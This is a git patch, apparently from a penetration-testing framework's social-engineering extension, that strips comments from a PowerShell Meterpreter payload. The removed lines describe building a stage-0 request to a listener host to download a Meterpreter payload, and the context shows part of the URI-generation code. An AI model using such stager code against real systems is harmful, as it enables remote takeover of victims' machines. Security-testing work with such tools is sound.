From a826b89480b70325b916480b9dc41b6022b7eb74 Mon Sep 17 00:00:00 2001 From: Jonathan Echavarria Date: Fri, 12 Jun 2015 19:15:43 +0000 Subject: [PATCH] removed comments --- extensions/social_engineering/powershell/powershell_payload | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/extensions/social_engineering/powershell/powershell_payload b/extensions/social_engineering/powershell/powershell_payload index 3caa4c19b..04e127ad1 100644 --- a/extensions/social_engineering/powershell/powershell_payload +++ b/extensions/social_engineering/powershell/powershell_payload @@ -404,9 +404,7 @@ function Invoke-ps } } - # Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh? - # # $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM" - # # Write-Verbose "Requesting meterpreter payload from $Request" + # Meterpreter to initiate stage 0. $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray() $x = "" function sum($v){